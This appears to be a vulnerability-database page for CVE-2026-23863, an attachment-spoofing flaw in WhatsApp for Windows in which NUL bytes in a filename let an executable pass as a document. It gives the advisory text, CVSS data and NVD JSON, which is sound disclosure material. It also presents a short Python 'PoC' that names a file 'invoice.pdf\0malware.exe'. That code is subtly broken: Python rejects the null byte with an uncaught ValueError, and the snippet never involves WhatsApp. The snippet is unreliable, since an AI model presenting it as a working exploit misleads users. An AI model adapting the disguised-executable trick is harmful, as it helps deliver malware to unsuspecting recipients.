CVE-2026-23863

Description

An attachment spoofing issue in WhatsApp for Windows prior to v2.3000.1032164386.258709 could have allowed maliciously formatted documents with embedded NUL bytes in the filename to be shown in the application as one type of file but run as an executable when opened. We have not seen evidence of exploitation in the wild.

CVSS Details

CVSS Score

6.5

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:whatsapp:whatsapp:*:*:*:*:*:windows:*:* - VULNERABLE

WhatsApp for Windows < v2.3000.1032164386.258709

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import os

# CVE-2026-23863 PoC Concept
# Demonstrates creating a file with a NUL byte in the filename.
# This exploits the discrepancy between display and execution logic.

filename = "invoice.pdf\0malware.exe"
content = b"MZ\x90\x00" # Dummy PE header start

try:
    with open(filename, "wb") as f:
        f.write(content)
    print(f"Created file: {repr(filename)}")
    print("On vulnerable systems, this may display as invoice.pdf but execute as malware.exe")
except OSError as e:
    print(f"OS Error: {e}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-23863
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-23863
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-23863/
[4] VulDB https://vuldb.com/cve/CVE-2026-23863
[5] https://www.facebook.com/security/advisories/cve-2026-23863
[6] https://www.whatsapp.com/security/advisories/2026

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-23863", "sourceIdentifier": "[email protected]", "published": "2026-05-01T16:16:29.843", "lastModified": "2026-05-11T19:59:52.623", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An attachment spoofing issue in WhatsApp for Windows prior to v2.3000.1032164386.258709 could have allowed maliciously formatted documents with embedded NUL bytes in the filename to be shown in the application as one type of file but run as an executable when opened. We have not seen evidence of exploitation in the wild."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-158"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:whatsapp:whatsapp:*:*:*:*:*:windows:*:*", "versionEndExcluding": "2.3000.1032164386.258709", "matchCriteriaId": "1E1C0BD0-0D92-438F-AB63-A267635A5FDF"}]}]}], "references": [{"url": "https://www.facebook.com/security/advisories/cve-2026-23863", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://www.whatsapp.com/security/advisories/2026", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}